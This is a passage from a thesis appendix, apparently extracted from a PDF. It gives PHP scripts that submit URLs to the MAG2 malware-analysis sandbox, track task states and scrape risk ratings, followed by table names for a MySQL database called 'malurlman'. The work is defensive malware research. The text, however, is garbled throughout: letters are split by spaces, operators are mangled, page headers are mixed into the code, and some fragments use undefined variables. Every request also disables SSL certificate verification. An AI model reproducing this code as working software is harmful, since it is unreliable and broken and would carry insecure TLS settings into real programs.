mkdir ( $path , 0 7 7 7 , true ) ;
switch ( $sample [ ’ type ’ ] ) {
case ’PE ’ :
$ f i l e e x t = " exe " ;
break ;
case ’JAR ’ :
$fileext = " jar " ;
break ;
B.12. MAG2.PHP 87
}
$ f i l e n a m e = $sample [ ’md5 ’ ] . " . " . $ f i l e e x t ; // t h e md5 ( ) o f t h e
file
$ f i l e p a t h = $path . "/" . $ f i l e n a m e ;
$mongo >c l o s e ( ) ;
} c a t c h ( MongoConnectionException $e ) {
die ( ’ E r r o r c o n n e c t i n g t o MongoDB s e r v e r ’ ) ;
} c a t c h ( MongoException $e ) {
die ( ’ E r r o r : ’ . $e >getMessage ( ) ) ;
}
?>
B.12 MAG2.php
<?php
88 APPENDIX B. SOURCE CODE
/⇤ ⇤
⇤ Zend Framework B o o t s t r a p code from l i s t i n g B. 2 h e r e
⇤/
r e q u i r e _ o n c e ’HTTP/ Request2 . php ’ ;
$module_id = 4 ;
foreach ( $ u r l s a s $ u r l ) {
$mag2 = f a l s e ;
$ r e q u e s t = new HTTP_Request2 ( ’ h t t p s : / / mag2 . norman . com/ r a p i /
samples ? owner=vaagland ’ ) ;
$ r e q u e s t >setMethod ( HTTP_Request2 : :METHOD_POST)
>addPostParameter ( ’ u r l ’ , $ u r l [ ’ u r l ’ ] )
>s e t C o n f i g ( array ( ’ s s l _ v e r i f y _ p e e r ’ => f a l s e ) ) ;
try {
$ r e s p o n s e = $ r e q u e s t >send ( ) ;
i f (2 0 0 == $ r e s p o n s e >g e t S t a t u s ( ) ) {
// p r i n t _ r ( $ r e s p o n s e >getBody ( ) ) ;
$mag2 = json_decode ( $ r e s p o n s e >getBody ( ) ) ;
$mag2 = $mag2 >r e s u l t s [ 0 ] ;
} else {
echo ’ Unexpected HTTP s t a t u s : ’ . $ r e s p o n s e >g e t S t a t u s ( ) .
’ ’ .
B.12. MAG2.PHP 89
$ r e s p o n s e >getReasonPhrase ( ) ;
}
} c a t c h ( HTTP_Request2_Exception $e ) {
echo ’ E r r o r : ’ . $e >getMessage ( ) ;
}
i f ( $mag2 != f a l s e ) {
$ r e q u e s t = new HTTP_Request2 ( ’ h t t p s : / / mag2 . norman . com/ r a p i /
t a s k s ? owner=vaagland ’ ) ;
$ r e q u e s t >setMethod ( HTTP_Request2 : :METHOD_POST)
>s e t C o n f i g ( array ( ’ s s l _ v e r i f y _ p e e r ’ => f a l s e ) )
>addPostParameter ( ’ sample_id ’ , $mag2 >samples_sample_id )
>addPostParameter ( ’ env ’ , "ivm" )
>addPostParameter ( ’tp_IVM .FIREWALL ’ , 3 ) ;
try {
$ r e s p o n s e = $ r e q u e s t >send ( ) ;
i f (2 0 0 == $ r e s p o n s e >g e t S t a t u s ( ) ) {
$mag2_task = json_decode ( $ r e s p o n s e >getBody ( ) ) ;
$mag2_task = $mag2_task >r e s u l t s [ 0 ] ;
$data = array ( ’ u r l _ i d ’ => $ u r l [ ’ u r l _ i d ’ ] ,
’ sample_id ’ => $mag2_task >tasks_sample_id ,
’ task_id ’ => $mag2_task >tasks_task_id ,
’ t a s k _ s t a t e ’ => $mag2_task >t a s k _ s t a t e _ s t a t e ) ;
$db >i n s e r t ( ’ mag2_tasks ’ , $data ) ;
$db >delete ( ’ u r l _ a n a l y s i s _ q u e u e ’ ,
array ( ’ u r l _ i d = ? ’ => $ u r l [ ’ u r l _ i d ’ ] ,
’ module_id = ? ’ => $module_id )
);
90 APPENDIX B. SOURCE CODE
} else {
echo ’ Unexpected HTTP s t a t u s : ’ . $ r e s p o n s e >g e t S t a t u s ( )
. ’ ’ .
$ r e s p o n s e >getReasonPhrase ( ) ;
}
} c a t c h ( HTTP_Request2_Exception $e ) {
echo ’ E r r o r : ’ . $e >getMessage ( ) ;
}
}
}
?>
<?php
/⇤ ⇤
⇤ Zend Framework B o o t s t r a p code from l i s t i n g B. 2 h e r e
⇤/
r e q u i r e _ o n c e ’HTTP/ Request2 . php ’ ;
$module_id = 4 ;
$ t a s k s = $db >f e t c h a l l ( "SELECT ⇤ FROM mag2_tasks WHERE
t a s k _ s t a t e NOT LIKE ’CORE_COMPLETE’ " ) ;
$data = array ( ) ;
B.13. MAG2 RESULTS 91
foreach ( $ t a s k s a s $ t a s k ) {
$ r e q u e s t = new HTTP_Request2 ( ’ h t t p s : / / mag2 . norman . com/ r a p i /
t a s k s / ’ . $ t a s k [ ’ task_id ’ ] . ’ ’ ) ;
$ r e q u e s t >setMethod ( HTTP_Request2 : :METHOD_GET)
>s e t C o n f i g ( array ( ’ s s l _ v e r i f y _ p e e r ’ => f a l s e ) ) ;
try {
$ r e s p o n s e = $ r e q u e s t >send ( ) ;
i f (2 0 0 == $ r e s p o n s e >g e t S t a t u s ( ) ) {
$mag2 = json_decode ( $ r e s p o n s e >getBody ( ) ) ;
print_r ( $mag2 ) ;
$data [ ’ t a s k _ s t a t e ’ ] = $mag2 >r e s u l t s [0] > t a s k _ s t a t e _ s t a t e ;
var_dump( $data ) ;
} else {
echo ’ Unexpected HTTP s t a t u s : ’ . $ r e s p o n s e >g e t S t a t u s ( ) .
’ ’ .
$ r e s p o n s e >getReasonPhrase ( ) ;
}
} c a t c h ( HTTP_Request2_Exception $e ) {
echo ’ E r r o r : ’ . $e >getMessage ( ) ;
}
i f ( $data [ ’ t a s k _ s t a t e ’ ] == ’CORE_COMPLETE’ ) {
$db >update ( ’ mag2_tasks ’ ,
array ( ’ t a s k _ s t a t e ’ => ’CORE_COMPLETE’ ) , ’ task_id = ’ .
$ t a s k [ ’ task_id ’ ] ) ;
try {
$ r e s p o n s e = $ r e q u e s t >send ( ) ;
i f (2 0 0 == $ r e s p o n s e >g e t S t a t u s ( ) ) {
$mag2 = json_decode ( $ r e s p o n s e >getBody ( ) ) ;
} else {
echo ’ Unexpected HTTP s t a t u s : ’ . $ r e s p o n s e >g e t S t a t u s ( )
. ’ ’ .
$ r e s p o n s e >getReasonPhrase ( ) ;
}
} c a t c h ( HTTP_Request2_Exception $e ) {
echo ’ E r r o r : ’ . $e >getMessage ( ) ;
}
try {
$ r e s p o n s e = $ r e q u e s t >send ( ) ;
i f (2 0 0 == $ r e s p o n s e >g e t S t a t u s ( ) ) {
$mag2 = json_decode ( $ r e s p o n s e >getBody ( ) ) ;
} else {
echo ’ Unexpected HTTP s t a t u s : ’ . $ r e s p o n s e >g e t S t a t u s ( )
. ’ ’ .
$ r e s p o n s e >getReasonPhrase ( ) ;
}
} c a t c h ( HTTP_Request2_Exception $e ) {
echo ’ E r r o r : ’ . $e >getMessage ( ) ;
}
try {
$ r e s p o n s e = $ r e q u e s t >send ( ) ;
i f (2 0 0 == $ r e s p o n s e >g e t S t a t u s ( ) ) {
} else {
echo ’ Unexpected HTTP s t a t u s : ’ . $ r e s p o n s e >g e t S t a t u s ( )
. ’ ’ . $ r e s p o n s e >getReasonPhrase ( ) ;
}
} c a t c h ( HTTP_Request2_Exception $e ) {
echo ’ E r r o r : ’ . $e >getMessage ( ) ;
}
}
}
?>
<?php
/⇤ ⇤
⇤ Zend Framework B o o t s t r a p code from l i s t i n g B. 2 h e r e
⇤/
r e q u i r e _ o n c e ’HTTP/ Request2 . php ’ ;
try {
$ r e s p o n s e = $ r e q u e s t >send ( ) ;
i f (2 0 0 == $ r e s p o n s e >g e t S t a t u s ( ) ) {
$mag2 = json_decode ( $ r e s p o n s e >getBody ( ) ) ;
$mag2 = $mag2 >r e s u l t s [ 0 ] ;
} else {
echo ’ Unexpected HTTP s t a t u s : ’ . $ r e s p o n s e >g e t S t a t u s ( ) .
’ ’ .
$ r e s p o n s e >getReasonPhrase ( ) ;
}
} c a t c h ( HTTP_Request2_Exception $e ) {
echo ’ E r r o r : ’ . $e >getMessage ( ) ;
}
i f ( $mag2 != f a l s e ) {
$ r e q u e s t = new HTTP_Request2 ( ’ h t t p s : / / mag2 . norman . com/ r a p i /
t a s k s ? owner=vaagland ’ ) ;
$ r e q u e s t >setMethod ( HTTP_Request2 : :METHOD_POST)
>s e t C o n f i g ( array ( ’ s s l _ v e r i f y _ p e e r ’ => f a l s e ) )
>addPostParameter ( ’ sample_id ’ , $mag2 >samples_sample_id )
>addPostParameter ( ’ env ’ , "ivm" )
>addPostParameter ( ’tp_IVM .FIREWALL ’ , 3 ) ;
96 APPENDIX B. SOURCE CODE
try {
$ r e s p o n s e = $ r e q u e s t >send ( ) ;
i f (2 0 0 == $ r e s p o n s e >g e t S t a t u s ( ) ) {
print_r ( $ r e s p o n s e >getBody ( ) ) ;
$mag2_task = json_decode ( $ r e s p o n s e >getBody ( ) ) ;
$mag2_task = $mag2_task >r e s u l t s [ 0 ] ;
i f ( $url_id [ 0 ] [ ’ id ’ ] ) {
$data = array ( ’ u r l _ i d ’ => $ u r l _ i d [ 0 ] [ ’ i d ’ ] ,
’ sample_id ’ => $mag2_task >tasks_sample_id ,
’ task_id ’ => $mag2_task >tasks_task_id ,
’ t a s k _ s t a t e ’ => $mag2_task >t a s k _ s t a t e _ s t a t e ) ;
$db >i n s e r t ( ’ mag2_tasks ’ , $data ) ;
} else {
echo " whoops " . $sample [ ’ u r l ’ ] . " i s not i n u r l t a b l e \n" ;
}
} else {
echo ’ Unexpected HTTP s t a t u s : ’ . $ r e s p o n s e >g e t S t a t u s ( ) .
’ ’ .
$ r e s p o n s e >getReasonPhrase ( ) ;
}
} c a t c h ( HTTP_Request2_Exception $e ) {
echo ’ E r r o r : ’ . $e >getMessage ( ) ;
}
}
}
B.15. MAG2 RISK 97
<?php
/⇤ ⇤
⇤ Zend Framework B o o t s t r a p code from l i s t i n g B. 2 h e r e
⇤/
r e q u i r e _ o n c e ’HTTP/ Request2 . php ’ ;
$module_id = 4 ;
foreach ( $ t a s k s a s $ t a s k ) {
$ r e s p o n s e = $ r e q u e s t >send ( ) ;
$html = $ r e s p o n s e >getBody ( ) ;
$ l i n e s = array ( ) ;
foreach ( p r e g _ s p l i t ( " / (\ r ?\n ) /" , $html ) a s $ l i n e ) {
$lines [ ] = $line ;
i f ( s t r s t r ( $ l i n e , ’<i n p u t type="hidden " name=" a n t i c s r f "
v a l u e=" ’ ) ) {
98 APPENDIX B. SOURCE CODE
$ c s r f = trim ( $ l i n e ) ;
}
}
foreach ( $ r e s p o n s e >g e t C o o k i e s ( ) as $ a r C o o k i e ) {
$ r e q u e s t 2 >addCookie ( $ a r C o o k i e [ ’ name ’ ] , $ a r C o o k i e [ ’ v a l u e ’ ] ) ;
}
$ r e s p o n s e = $ r e q u e s t 2 >send ( ) ;
$html = $ r e s p o n s e >getBody ( ) ;
$ l i n e s = array ( ) ;
foreach ( p r e g _ s p l i t ( " / (\ r ?\n ) /" , $html ) a s $ l i n e ) {
$lines [ ] = $line ;
i f ( s t r s t r ( $ l i n e , ’< l i ><b>Risk l e v e l :</b> ’ ) ) {
B.16. MYSQL 99
$ r i s k = trim ( $ l i n e ) ;
}
}
$data = $ t a s k ;
unset ( $data [ ’ t a s k _ s t a t e ’ ] ) ;
$data [ ’ r i s k ’ ] = $ r i s k ;
var_dump( $data ) ;
$db >i n s e r t ( ’ mag2_risk ’ , $data ) ;
}
?>
B.16 MySQL
Host : l o c a l h o s t
Generation Time : Jun 11 , 2012 a t 1 1 : 5 5 AM
Server version : 5.1.61
PHP Version : 5.3.3 7+ s q u e e z e 9
SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO" ;
100 APPENDIX B. SOURCE CODE
/⇤ ! 4 0 1 0 1 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT
⇤/ ;
/⇤ ! 4 0 1 0 1 SET @OLD_CHARACTER_SET_RESULTS=
@@CHARACTER_SET_RESULTS ⇤/ ;
/⇤ ! 4 0 1 0 1 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION
⇤/ ;
/⇤ ! 4 0 1 0 1 SET NAMES u t f 8 ⇤/ ;
Database : ‘ malurlman ‘
Table s t r u c t u r e f o r t a b l e ‘ a n a l y s i s ‘
Table s t r u c t u r e f o r t a b l e ‘ analysis_module ‘
B.16. MYSQL 101
Table s t r u c t u r e f o r t a b l e ‘ a n a l y s i s _ m o d u l e _ r e s u l t s ‘
Table s t r u c t u r e f o r t a b l e ‘ domain ‘
Table s t r u c t u r e f o r t a b l e ‘ ip ‘
Table s t r u c t u r e f o r t a b l e ‘ ip_domain ‘
Table s t r u c t u r e f o r t a b l e ‘ ip_domain_url ‘
Table s t r u c t u r e f o r t a b l e ‘ mag2_risk ‘
Table s t r u c t u r e f o r t a b l e ‘ mag2_tasks ‘
Table s t r u c t u r e f o r t a b l e ‘ s t a t u s ‘
B.16. MYSQL 105
Table s t r u c t u r e f o r t a b l e ‘ thug_samples ‘
Table s t r u c t u r e f o r t a b l e ‘ t h u g _ t a s k s ‘
106 APPENDIX B. SOURCE CODE
Table s t r u c t u r e f o r t a b l e ‘ u r l ‘
Table s t r u c t u r e f o r t a b l e ‘ u r l _ a n a l y s i s _ q u e u e ‘
B.16. MYSQL 107
Table s t r u c t u r e f o r t a b l e ‘ url_domain ‘
Table s t r u c t u r e f o r t a b l e ‘ url_queue ‘
Table s t r u c t u r e f o r t a b l e ‘ u r l _ s o u r c e s ‘
Table s t r u c t u r e f o r t a b l e ‘ u r l _ s t a t u s ‘
Table s t r u c t u r e f o r t a b l e ‘ whois ‘
Table s t r u c t u r e f o r t a b l e ‘ whois_data ‘